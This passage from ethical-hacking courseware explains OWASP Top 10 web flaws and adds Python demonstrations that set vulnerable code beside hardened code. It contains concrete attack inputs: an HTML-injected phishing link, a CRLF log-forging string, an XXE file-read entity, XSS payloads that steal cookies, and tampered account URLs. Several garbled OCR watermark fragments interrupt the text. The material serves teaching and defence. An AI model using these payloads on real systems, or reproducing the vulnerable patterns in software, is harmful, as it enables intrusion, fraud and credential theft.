</h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2>
Resulting page following HTML injection:
<html>
<h1> Results matching the given query: </h1>
<h2></h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2></h2>
<ol> <li> Result A
<li> Result B </ol>
</html>
However, the attacker aims to include HTML code in a page that other users visit. For this purpose, code injection should be included in the page content that is intended to be viewed by end users. The injection occurs if applications save untrusted user inputs and disclose data to other users. For instance, assume that the abovementioned application consists of a page showing the users' search history:
Code snippet (application template) for search history page
<html>
<h1> Recent search history: </h1>
<ol> <li><h2> {user_query_1} </h2>
<li><h2> {user_query_2} </h2></ol>
</html>
Resulting search history page following HTML injection:
<html>
<h1> Recent search history: </h1>
<ol>
<li><h2> Top 10 thriller movies </h2>
<li><h2></h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2></h2>
</ol> </html>
Now, every search result link that a user tries to access will display a malicious link generated by the attacker. If any user is attracted to the link and opens it, he/she will be viewing the content generated from the attacker's domain, and any credentials entered on that page are exfiltrated to the attacker.
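As an added example (not the courseware's code), the Python below renders the search-history template above from constructed stored queries, once as the vulnerable template does and once with output escaping, and includes a check that lists every anchor found in a page that should contain none.

```python
import html
import re

# Constructed stored search-history entries, modelled on the example in the text.
STORED_QUERIES = [
    "Top 10 thriller movies",
    "</h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2>",
]

PAGE = "<html>\n<h1> Recent search history: </h1>\n<ol>\n%s\n</ol> </html>"
ANCHOR_RE = re.compile(r"<a\s+href=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def render_history_vulnerable(queries):
    """Vulnerable template: stored user input placed straight into the markup,
    so the closing </h2> and the <a> tag in the input become real elements."""
    items = "\n".join("<li><h2> %s </h2>" % q for q in queries)
    return PAGE % items


def render_history_safe(queries):
    """Hardened template: each value is HTML-escaped at the point of output,
    so '<', '>', '&' and quotes reach the browser as text, not as tags."""
    items = "\n".join("<li><h2> %s </h2>" % html.escape(q, quote=True) for q in queries)
    return PAGE % items


def anchors_in(page):
    """Detection helper for a page that is supposed to contain no links:
    every href found here came from injected content."""
    return ANCHOR_RE.findall(page)


if __name__ == "__main__":
    print(render_history_vulnerable(STORED_QUERIES))
    print(anchors_in(render_history_vulnerable(STORED_QUERIES)))  # ['www.certifiedhacker.com']
    print(render_history_safe(STORED_QUERIES))
    print(anchors_in(render_history_safe(STORED_QUERIES)))        # []
```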
* CRLF Injection
In a carriage return line feed (CRLF) injection attack, attackers inject carriage return (\r) and line feed (\n) characters into the user's input to trick the web server, web application, or user into believing that the current object is terminated and a new object has been initiated. CRLF injection is a vulnerability that manifests when a user enters CRLF characters into an application. These characters signify the end of the line for different Internet protocols, which, when combined with HTTP request/response headers, can lead to various vulnerabilities such as HTTP request smuggling and response splitting.
HTTP request smuggling can occur when an HTTP request is transmitted via a server, which serves as a proxy to validate and forward the request to the next server. Such vulnerabilities can also lead to further attacks such as cache poisoning, firewall security breach, and request hijacking.
In HTTP response splitting, attackers can include arbitrary HTTP headers for the HTTP response to split the response and body. It results in delivering two responses instead of one, which can lead to further vulnerabilities such as cross-site scripting.
Consider the following example of CRLF injection in log files:
Suppose that the admin panel has a log file with the IP, time, and URL path of the visited site as follows:
10.10.10.10 - 09:25 - /index.php?page=about

If an attacker can embed CRLF characters into the HTTP request, then he/she can change the output flow and can enter fake log entries. Furthermore, the attacker can alter the web application response as follows:
/index.php?page=about%0d%0a127.0.0.1 - 09:25 - /index.php?page=about&restrictedaction=edit
Here, %0d and %0a are CR and LF encoded characters.
After injecting CRLF characters, the log entries appear as follows:
10.10.10.10 - 09:25 - /index.php?page=about
127.0.0.1 - 09:25 - /index.php?page=home&restrictedaction=edit
Attackers exploit CRLF injection vulnerabilities to manipulate log entries to hide their malicious activities.
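The Python below is an added example, not the courseware's code, and serves both the log injection discussion above (the \r\n and null-byte cases) and this CRLF example. It writes the constructed "IP - time - path" log line with and without neutralising CR, LF and NUL, parses the result the way the admin panel would, and flags lines that carry a bare CR, which a logger emitting "\n"-terminated lines never produces on its own.

```python
import re
import urllib.parse

# Constructed log format from the text: "IP - HH:MM - path", one entry per line.
LINE_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}) - (\d\d:\d\d) - (.+)$")

# The attacker's request path from the text, as the server sees it after URL decoding.
ATTACK_PATH = urllib.parse.unquote(
    "/index.php?page=about%0d%0a127.0.0.1 - 09:25 - /index.php?page=home&restrictedaction=edit"
)


def sanitize_log_field(value):
    """Neutralise CR, LF and NUL before a user-supplied value reaches the log,
    so the value can neither start a new line nor truncate the current one."""
    return value.replace("\r", "%0d").replace("\n", "%0a").replace("\x00", "%00")


def vulnerable_log_entry(ip, time, path):
    """Vulnerable: the path is written as-is, so CR/LF inside it start a forged line."""
    return "%s - %s - %s" % (ip, time, path)


def safe_log_entry(ip, time, path):
    """Hardened: the user-controlled field is sanitised first."""
    return "%s - %s - %s" % (ip, time, sanitize_log_field(path))


def write_log(entries):
    return "\n".join(entries) + "\n"


def parse_log(log_text):
    """Parse as the admin panel would; each element is (ip, time, path), or None
    when a line does not fit the format."""
    parsed = []
    for line in log_text.split("\n"):
        if not line:
            continue
        match = LINE_RE.match(line.rstrip("\r"))
        parsed.append(match.groups() if match else None)
    return parsed


def suspicious_lines(log_text):
    """Detection: 1-based numbers of lines ending in a bare CR or containing NUL."""
    return [n for n, line in enumerate(log_text.split("\n"), 1)
            if line.endswith("\r") or "\x00" in line]


if __name__ == "__main__":
    forged = write_log([vulnerable_log_entry("10.10.10.10", "09:25", ATTACK_PATH)])
    print(parse_log(forged))        # two entries, the second from 127.0.0.1 is fake
    print(suspicious_lines(forged)) # [1]
    clean = write_log([safe_log_entry("10.10.10.10", "09:25", ATTACK_PATH)])
    print(parse_log(clean))         # one entry, with %0d%0a visible in the path
```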

A2 - Broken Authentication
Authentication and session management includes every aspect of user authentication and management of active sessions. At present, web applications implementing solid authentication fail because of weak credential functions such as "change my password," "forgot my password," "remember my password," "account update," and so on. Therefore, developers must take the utmost care to implement user authentication securely. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker exploits vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.
* Session ID in URLs
  o Example:
  A web application creates a session ID for the respective login when a user logs into http://certifiedhackershop.com. An attacker uses a sniffer to sniff the cookie that contains the session ID or tricks the user into getting the session ID. The attacker now enters the following URL in his browser's address bar:
  http://certifiedhackershop.com/sale/saleitems=304;jsessionid=2OMTOIDPXMOOQSABGCKLHCJUN2IV?dest=NewMexico
  This redirects him to the already logged in page of the victim. The attacker successfully impersonates the victim.

* Password Exploitation
  Attackers can identify passwords stored in databases because of weak hashing algorithms. Attackers can gain access to the web application's password database if user passwords are not encrypted, which allows the attacker to exploit every user's password.
* Timeout Exploitation
  If an application's session timeouts are set to longer durations, the sessions will last until the time specified, i.e., the session will be valid for a longer period. When the user closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later to conduct the attack, as session IDs can remain valid; thus, they can exploit the user's privileges.
  o Example:
  A user logs in to www.certifiedhacker.com using his/her credentials. After performing certain tasks, he/she closes the web browser without logging out of the page. The web application's session timeout is set to two hours. During the specified session interval, if an attacker has physical access to the user's system, he may then launch the browser, check the history, and click the www.certifiedhacker.com link, which automatically redirects him to the user's account without the need to enter the user's credentials.

A3 - Sensitive Data Exposure
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information in a database or on a file system. If users do not maintain proper security of their storage locations, then the application may be at risk, as attackers can access the storage and misuse the information.
Many web applications do not protect their sensitive data properly from unauthorized users. Web applications use cryptographic algorithms to encrypt their data and other sensitive information that they need to transfer from the server to the client or vice versa. Sensitive data exposure occurs due to flaws such as insecure cryptographic storage and information leakage. Even though the data is encrypted, some cryptographic encryption methods have inherent weaknesses allowing attackers to exploit and steal the data. When an application uses poorly written encryption code to encrypt and store sensitive data in the database, the attacker can easily exploit this flaw and steal or modify weakly protected sensitive data such as credit card numbers, SSNs, and other authentication credentials. Thus, they can launch further attacks such as identity theft and credit card fraud.
Developers can avoid such attacks using proper algorithms to encrypt sensitive data. At the same time, developers must take care to store the cryptographic keys securely. If these keys are stored at insecure locations, then attackers can retrieve them easily and decrypt the sensitive data. Insecure storage of keys, certificates, and passwords also allows the attacker to gain access to the web application as a legitimate user. Sensitive data exposure can cause severe losses to a company. Hence, organizations must protect all their sources such as systems or other network resources from information leakage by employing proper content-filtering mechanisms.

The screenshots below show poorly encrypted vulnerable code and secure code that is properly encrypted using a secure cryptographic algorithm.

Vulnerable Code

Figure 14.9: Vulnerable code example

Secure Code

Figure 14.10: Secure code example
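The two figures (not reproduced in this text) contrast weak and proper cryptographic storage. As an added example, not the courseware's own code, the following Python shows both sides for stored passwords: an unsalted MD5 hash that an attacker matches instantly against a precomputed table, and a salted PBKDF2-HMAC-SHA256 hash with a per-user random salt, a stored work factor and a constant-time verify. The passwords and the small lookup table are constructed for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # PBKDF2 work factor; tune so one hash costs ~100 ms on the server

# --- Vulnerable: fast, unsalted, reversible by lookup ------------------------------
def store_password_vulnerable(password):
    return hashlib.md5(password.encode()).hexdigest()

# Constructed stand-in for an attacker's precomputed table of common passwords.
RAINBOW_TABLE = {hashlib.md5(p.encode()).hexdigest(): p
                 for p in ("password", "123456", "letmein", "qwerty")}

def crack_by_lookup(stored_hash):
    """Recovers the plaintext immediately when the hash is unsalted and fast."""
    return RAINBOW_TABLE.get(stored_hash)

# --- Secure: per-user salt, slow KDF, constant-time comparison ----------------------
def store_password_secure(password):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Store every parameter needed to verify later so the work factor can be raised
    # without invalidating existing records.
    return "pbkdf2_sha256${}${}${}".format(ITERATIONS, salt.hex(), digest.hex())

def verify_password_secure(password, stored):
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # compare_digest does not leak the position of the first mismatching byte.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))

def salted_hashes_differ(password):
    """Two users with the same password get different stored values."""
    return store_password_secure(password) != store_password_secure(password)
```

The same principle applies to the stored card numbers and keys the section mentions: a fast, deterministic transform of a low-entropy value is a lookup table waiting to be built, and the key used to encrypt data must live somewhere the attacker who dumps the database cannot also read.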

A4 - XML External Entity (XXE)
An XML External Entity (XXE) attack is closely related to Server-side Request Forgery (SSRF): an application parses XML input from an unreliable source with a misconfigured XML parser. In this attack, an attacker sends malicious XML input containing a reference to an external entity to the victim's web application. When this malicious input is processed by the weakly configured XML parser of the target web application, it enables the attacker to access protected files and services from servers or connected networks.

Since XML features are widely available, the attacker abuses these features to create documents or files dynamically at the time of processing. Attackers tend to make the most of this attack, as it allows them to retrieve confidential data, perform DoS attacks, and obtain sensitive information via HTTP(S); in some worst-case scenarios, they may even be able to perform remote code execution or launch a CSRF attack on any vulnerable service.

According to the XML 1.0 standard, XML uses entities, often defined as storage units. Entities are special features of XML that can access local or remote content, and they can be defined anywhere in a system via system identifiers. The entities need not be part of an XML document, as they can come from an external system as well. The system identifiers, which act as URIs, are used by the XML processor while processing the entity. The XML parsing process replaces these entities with their actual data; here, the attacker exploits this behaviour by forcing the XML parser to access the file or the content specified by him/her. This attack is more dangerous when a trusted application processes the XML documents, because the attacker can abuse that trust to pivot into the internal system and acquire all sorts of internal data.

For example, the attacker sends the following request to extract system data from the vulnerable target.

Figure: malicious XXE request sent to a web application with a weakly configured XML parser
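The request itself is only in the figure. As an added example (not the courseware's code), the following Python builds the classic payload and feeds it to the standard library's xml.sax parser twice: once with external general entity resolution switched on, which is the weak configuration the text describes, and once with the library default. The secret file is constructed in a temporary directory and stands in for a file such as /etc/passwd; `xxe_payload`, `parse_untrusted` and `demo` are names chosen for the example.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed secret standing in for a file the attacker is after (e.g. /etc/passwd).
SECRET = "db_password=constructed-secret-value"


class TextCollector(ContentHandler):
    """Accumulates the character data the parser delivers for the document."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def xxe_payload(target_path):
    """The classic payload: the internal DTD subset declares an external general
    entity whose system identifier is a file: URI, then references it in content."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        ']>\n'
        '<data>&xxe;</data>\n'
    ).encode()


def parse_untrusted(xml_bytes, resolve_external_entities):
    """Parse with xml.sax; the flag is the misconfiguration under discussion."""
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    # Default is False. True makes the parser fetch the entity and inline its
    # contents into the document, which is exactly what the attacker wants.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def demo():
    """Returns (what the vulnerable parser leaked, what the safe parser returned)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "secret.txt")
        with open(path, "w") as f:
            f.write(SECRET + "\n")
        payload = xxe_payload(path)
        leaked = parse_untrusted(payload, resolve_external_entities=True)
        safe = parse_untrusted(payload, resolve_external_entities=False)
    return leaked, safe
```

The same system identifier can be an http:// URL, which is the SSRF angle: the server fetches whatever the attacker names, from wherever the server can reach. The fix is the parser setting, not input filtering; keep external entity and DTD processing off for untrusted input.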

A5 - Broken Access Control

Access control refers to how a web application grants access to create, update, and delete any record/content or function to users while restricting some privileged access to other users.
Broken access control is a method in which an attacker identifies a flaw related to access control, bypasses the authentication or authorization checks, and then compromises the network. Access control weaknesses are common due to the lack of automated detection and effective functional testing by application developers. They allow attackers to act as users or administrators with privileged functions and create, access, update, or delete any record.

According to the OWASP Top 10 2017 (RC2) revision, broken access control is a combination of insecure direct object reference and missing function level access control.

Insecure Direct Object References: When developers expose various internal implementation objects such as files, directories, database records, or keys through references, the result is an insecure direct object reference. For example, if a bank account number is a primary key, there is a chance of the application being compromised by attackers who take advantage of such references.

Missing Function Level Access Control: In some web applications, function level protection is managed via configuration, and attackers exploit these function level access control flaws to access unauthorized functionality. The main targets of the attackers in this scenario are the administrative functions. Developers must include proper code checks to prevent such attacks. Detecting such flaws is easy for an attacker; however, identifying the vulnerable functions or web pages (URLs) to attack is considerably more difficult.
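Both halves of the definition come down to a check that is missing from the code path. The following Python is an added example, not the courseware's code: the bank account primary key from the text is read straight from the request (the insecure direct object reference), then bound to the authenticated user; and an administrative function is protected by a role check enforced in code rather than by keeping its URL out of the menu. The account table, role table, `Forbidden` exception and `requires_role` decorator are assumptions made for the example.

```python
# Constructed data standing in for the application's database.
ACCOUNTS = {
    123456789: {"owner": "alice", "balance": 500},
    868686868: {"owner": "alice", "balance": 1200},
    555555555: {"owner": "bob",   "balance": 80},
}
ROLES = {"alice": "user", "bob": "user", "root": "admin"}


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the operation."""


# --- Insecure direct object reference ------------------------------------------
def get_account_vulnerable(session_user, account_no):
    # The primary key from the request is used directly; any authenticated user
    # can walk the ID space and read other customers' records.
    return ACCOUNTS[account_no]


def get_account_secure(session_user, account_no):
    account = ACCOUNTS.get(account_no)
    # Existence and ownership are checked together so the response does not
    # reveal which account numbers exist.
    if account is None or account["owner"] != session_user:
        raise Forbidden("no such account for this user")
    return account


# --- Missing function level access control --------------------------------------
def requires_role(role):
    """Decorator enforcing the check in code, not in a URL list in configuration."""
    def wrap(fn):
        def checked(session_user, *args, **kwargs):
            if ROLES.get(session_user) != role:
                raise Forbidden(f"{fn.__name__} requires role {role}")
            return fn(session_user, *args, **kwargs)
        return checked
    return wrap


def close_account_vulnerable(session_user, account_no):
    # Reachable by anyone who guesses the admin URL; the only "protection" was
    # that the link is not shown in a normal user's menu.
    return ACCOUNTS.pop(account_no, None)


@requires_role("admin")
def close_account_secure(session_user, account_no):
    return ACCOUNTS.pop(account_no, None)


def is_forbidden(fn, *args):
    """Helper returning True when fn(*args) raises Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

Denying by default and keying every lookup on the session identity is what makes the ID space unenumerable; the decorator puts the function-level rule next to the function so a new route cannot be deployed without it.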
A6 - Security Misconfiguration
Developers and network administrators should ensure that the entire application stack is configured properly; otherwise, security misconfiguration can occur at any level of the stack, including its platform, web server, application server, framework, and custom code. For instance, if the developer does not configure the server properly, it could result in various problems that affect the site security. Problems that lead to such instances include unvalidated inputs, parameter/form tampering, improper error handling, insufficient transport layer protection, etc.
Unvalidated Inputs
Input validation flaws refer to a web application vulnerability whereby input from a client is not validated before being processed by the web application's backend servers. No validation or improper validation can make a web application vulnerable to various input validation attacks. If web applications implement input validation only on the client side, attackers can easily bypass it by tampering with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data are stored in cookies, which become a means of attack. An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc., resulting in data theft and system malfunction.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 14.13: Unvalidated input attack

Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged between the client and the server to modify application data such as user credentials and permissions, prices, and quantities of products. This information is usually stored in cookies, hidden form fields, or URL query strings. The web application uses it to increase its functionality and control. A man-in-the-middle (MITM) attack is an example of this type of attack. Attackers use tools such as WebScarab and WebSploit Framework for these attacks.

Parameter tampering is a simple type of attack aimed directly at an application's business logic. It takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.
Detailed Description:
After a session is established between the web application and the user, an exchange of parameters between the web browser and the web application takes place to maintain information about a client's session, which eliminates the need to maintain a complex database on the server side. A web application uses URL queries, form fields, and cookies to pass these parameters.

Changing parameters in the form field is the best example of parameter tampering. When a user makes a selection on an HTML page, the selection is stored as a form field value and transferred to the web application in an HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, the attack involves saving the page, editing the HTML, and reloading the page in the web browser.

Hidden fields that are invisible to the end user provide status information to the web application. For example, consider a product order form that includes the following hidden field:

<input type="hidden" name="price" value="99.90">

ical andCountermensores
Mackin ©by E-Comel
Copyright
Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the following combo box:

<FORM>
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="123456789">######789</OPTION>
<OPTION VALUE="868686868">######868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=20>
<BR><INPUT TYPE=SUBMIT><INPUT TYPE=RESET>
</FORM>

Bypassing:
An attacker may bypass the need to choose between two accounts by adding another account in the HTML page source code. The web browser displays the new combo box, and the attacker can choose the new account.
HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the user clicks on a submit button in the web browser, the URL request is as follows:

http://www.certifiedhackerbank.com/cust.asp?profile=21&debit=2500

The attacker may change the URL parameters (profile and debit) to debit another account:

http://www.certifiedhackerbank.com/cust.asp?profile=82&debit=1500

The attacker can modify other URL parameters, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify the content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually via cookies). An ordinary user will request the following link:

http://www.certifiedhackerbank.com/stat.asp?pg=531&status=view

The attacker can modify the status parameter to "delete" to obtain delete permission for the content:

http://www.certifiedhackerbank.com/stat.asp?pg=147&status=delete

ical andCountermensores
Mackin ©by E-Comel
Copyright
Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as to parameters that grant access to the developer and debugging information.

Figure 14.14: Parameter tampering attack example
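The Unvalidated Inputs and Parameter/Form Tampering passages above describe the same root cause: the server believing values the client controls. The following Python is an added example, not code from the courseware, showing the server side of the hidden price field and of the cust.asp?profile=...&debit=... request: the vulnerable handler trusts the submitted price and profile, while the hardened handler looks the price up server-side, validates quantity and amount against an allow-list pattern, and takes the identity from the session rather than the URL. The catalogue, profile table and `InvalidInput` exception are constructed for the example.

```python
import re
from decimal import Decimal
from urllib.parse import parse_qs, urlparse

# Constructed server-side data; the client must never be the source of these values.
CATALOG = {"SKU-1001": Decimal("99.90")}
PROFILES = {21: {"user": "alice"}, 82: {"user": "bob"}}

QTY_RE = re.compile(r"[1-9][0-9]{0,2}")             # 1..999 units
AMOUNT_RE = re.compile(r"[0-9]{1,7}(\.[0-9]{2})?")   # positive money amount


class InvalidInput(ValueError):
    pass


# --- Hidden price field ----------------------------------------------------------
def order_total_vulnerable(form):
    # Trusts <input type="hidden" name="price" value="99.90">; the attacker
    # resubmits the form with price=0.01.
    return Decimal(form["price"]) * int(form["qty"])


def order_total_secure(form):
    sku = form.get("sku", "")
    qty = form.get("qty", "")
    if sku not in CATALOG:
        raise InvalidInput("unknown product")
    if not QTY_RE.fullmatch(qty):            # allow-list, not a blacklist of bad chars
        raise InvalidInput("quantity must be 1-999")
    # The price comes from the catalogue; the client's copy is ignored entirely.
    return CATALOG[sku] * int(qty)


# --- Query-string profile/debit parameters ------------------------------------------
def debit_vulnerable(url):
    # cust.asp?profile=21&debit=2500: the profile to debit is taken from the URL.
    q = parse_qs(urlparse(url).query)
    profile = int(q["profile"][0])
    return PROFILES[profile]["user"], Decimal(q["debit"][0])


def debit_secure(session_user, url):
    q = parse_qs(urlparse(url).query)
    amount = q.get("debit", [""])[0]
    if not AMOUNT_RE.fullmatch(amount):
        raise InvalidInput("bad amount")
    # Identity is bound to the authenticated session; a profile parameter in the
    # URL is simply not consulted, so changing 21 to 82 achieves nothing.
    return session_user, Decimal(amount)


def rejects(fn, *args):
    """Helper returning True when fn(*args) raises InvalidInput."""
    try:
        fn(*args)
    except InvalidInput:
        return True
    return False
```

Client-side validation can stay for usability, but every check above runs on the server, against the request the server actually received.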

Improper Error Handling
It is necessary to define how a system or network should behave when an error occurs. Otherwise, the error may provide a chance for an attacker to break into the system. Improper error handling may lead to DoS attacks.

Improper error handling provides insights into the source code, such as logic flaws and default accounts, which the attacker can exploit. Using the information received from an error message, an attacker identifies vulnerabilities for launching various web application attacks. Improper exception handling occurs when web applications do not limit the amount of information they return to their users. Information leakage may include helpful error messages and service banners. Developers and system administrators often forget or disregard how an attacker can use something as simple as a server banner. The attacker will start searching for a place to identify vulnerabilities and attempt to leverage information that applications freely volunteer.

Figure 14.15: Screenshot displaying improper errors

The attacker can gather the following information from improper error handling:
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
Insufficient Transport Layer Protection
Insufficient transport layer protection is a security flaw that occurs when an application fails to protect sensitive traffic flowing in a network, for example by supporting weak algorithms or using expired or invalid certificates. Developers should use SSL/TLS for authentication on the websites; otherwise, an attacker can monitor the network traffic. Unless communication between websites and clients is encrypted, data can be intercepted, injected, or redirected. A poorly configured SSL setup can also help the attacker launch phishing and MITM attacks. System compromise may lead to various other threats such as account theft, phishing attacks, and compromised admin accounts. Thus, insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. All this occurs when applications support weak algorithms for SSL, use expired or invalid SSL certificates, or do not use them correctly.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Example
Assume that a user logs into an online banking application that possesses insufficient transport layer protection (i.e., it is not SSL encrypted). The sensitive data in the communication (e.g., the session ID) is vulnerable to attack during transit in plaintext format. This allows an attacker to steal such data to perform various types of attacks on the application.
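Expired certificates and weak protocol versions are only harmful if a peer accepts them, so the client-side configuration matters as much as the server's. The following Python is an added example, not the courseware's code: it shows the TLS client misconfiguration that makes the MITM in the text trivial (verification switched off) beside a hardened context, and two checks a practitioner runs against the certificate summary that `SSLSocket.getpeercert()` returns. `SAMPLE_CERT` is a constructed dictionary in that format, not a real certificate, and the helper names are chosen for the example.

```python
import ssl
import time


def weak_client_context():
    """The misconfiguration: no certificate validation, so any MITM certificate is accepted."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # must be cleared before verify_mode can change
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context():
    ctx = ssl.create_default_context()  # CERT_REQUIRED, hostname check, system CA bundle
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuses SSLv3, TLS 1.0/1.1 and their weak suites
    return ctx


def cert_is_expired(peercert, now=None):
    """peercert has the dict shape returned by SSLSocket.getpeercert()."""
    now = time.time() if now is None else now
    not_after = ssl.cert_time_to_seconds(peercert["notAfter"])
    return now > not_after


def hostname_matches(peercert, hostname):
    """Exact DNS subjectAltName match (wildcards deliberately not handled here)."""
    names = {v for k, v in peercert.get("subjectAltName", ()) if k == "DNS"}
    return hostname in names


# Constructed certificate summary in getpeercert() format (no real certificate).
SAMPLE_CERT = {
    "subject": ((("commonName", "www.certifiedhackerbank.com"),),),
    "subjectAltName": (("DNS", "www.certifiedhackerbank.com"),),
    "notBefore": "Jan  1 00:00:00 2020 GMT",
    "notAfter": "Jan  1 00:00:00 2021 GMT",
}
```

`create_default_context()` already performs the expiry and hostname checks during the handshake; the two helpers are what you would run when auditing a certificate obtained out of band, or when explaining to a developer what the "ignore SSL errors" flag actually switches off.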

Some server configuration problems are as follows:
- Server software flaws
- Enabling unnecessary services
- Improper authentication
- Unpatched security flaws

Automated scanners help to detect a few of these problems. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, and so on to gain unauthorized access. The person responsible should take care of all such unnecessary and unsafe features. Disabling them completely would prove to be highly beneficial, preventing outsiders from using them for malicious attacks. To avoid leakage of crucial information to attackers, the network administrator should thus take care of all application-based files through proper authentication and strong security methods. For example, if the application server admin console is automatically installed and not removed, and the default accounts are not changed, then the attacker discovers the standard admin pages on the server, logs in with default passwords, and establishes control over the server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
A7 - Cross-Site Scripting (XSS) Attacks


Cross-site scripting (XSS or CSS) attacks exploit vulnerabilities in dynamically generated web pages, which enables malicious attackers to inject client-side script into web pages viewed by other users. Such attacks occur when unvalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attackers inject malicious JavaScript, VBScript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests. Attackers bypass client-side security mechanisms, gain access privileges, and then inject malicious scripts into specific web pages. These malicious scripts can even rewrite HTML website content.

Some exploitations that can be performed by XSS attacks are as follows:
- Malicious script execution
- Session hijacking
- Redirecting to a malicious server
- Brute-force password cracking
- Exploiting user privileges
- Ads in hidden IFRAMES and pop-ups
- Data theft
- Intranet probing
- Data manipulation
- Keylogging and remote monitoring
How XSS Attacks Work
A web page consists of text and HTML markup created by the server and obtained by the client browser. Servers can control the client's interpretation of statically generated pages, but they cannot completely control the client's interpretation of the output of a page generated dynamically by the servers. Thus, if the attacker inserts untrusted content into a dynamic page, neither the server nor the client recognizes it. Untrusted input can come from URL parameters, form elements, cookies, database queries, and so on.

If the dynamic data inserted by the web server contains special characters, the user's web browser will mistake them for HTML markup, as it treats some characters as special to distinguish text from markup. Thus, an attacker can choose the data inserted into the generated page and mislead the user's browser into running the attacker's script. As the malicious scripts will execute in the browser's security context for communicating with the legitimate web server, the attacker will have complete access to the document retrieved and may send the data in the page back to his/her site.

Figure: XSS attack flow (normal request versus attack on a vulnerable web application)

Note: Check the CEH Tools, Module 14: Hacking Web Applications, for the XSS cheat sheet.
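The paragraph above is the whole mechanism: the browser cannot tell attacker data from markup unless the server encodes it for the context it lands in. The following Python is an added example, not code from the courseware, showing three server-side renderers for a user-supplied name: plain concatenation (the vulnerable case), a blacklist that strips <script> tags and is bypassed by an event handler on another tag, and context-aware escaping for HTML text and for a quoted attribute. The sample inputs and the crude `contains_live_tag` detector are constructed for the example.

```python
import html
import re

# Constructed user-supplied values of the kind found in URL parameters, form fields and comments.
SAMPLES = {
    "benign": "Tom & Jerry",
    "script": "<script>alert('Hello World')</script>",
    "img":    '<img src=x onerror="alert(document.cookie)">',
    "attr":   '" onmouseover="alert(1)',
}


def render_vulnerable(name):
    # Untrusted data concatenated straight into markup, as with clientprofile=<SCRIPT>...</SCRIPT>.
    return f"<p>Welcome, {name}</p>"


SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def render_blacklist(name):
    # A common but insufficient fix: strip <script> tags. Event handlers on other
    # tags (onerror, onload, onmouseover) are untouched and still execute.
    return f"<p>Welcome, {SCRIPT_TAG.sub('', name)}</p>"


def render_escaped(name):
    # HTML text context: encode & < > " ' so the browser never sees input as markup.
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


def render_attribute_escaped(name):
    # Attribute context: the value is quoted AND escaped, so a '"' in the input
    # cannot close the attribute and start an onmouseover= of its own.
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def contains_live_tag(fragment):
    """Crude detector for the text context only: an unescaped <script> or an
    unescaped tag carrying an on*= handler. Used to compare the renderers."""
    return bool(re.search(r"<script|<\w+[^>]*\son\w+\s*=", fragment, re.IGNORECASE))
```

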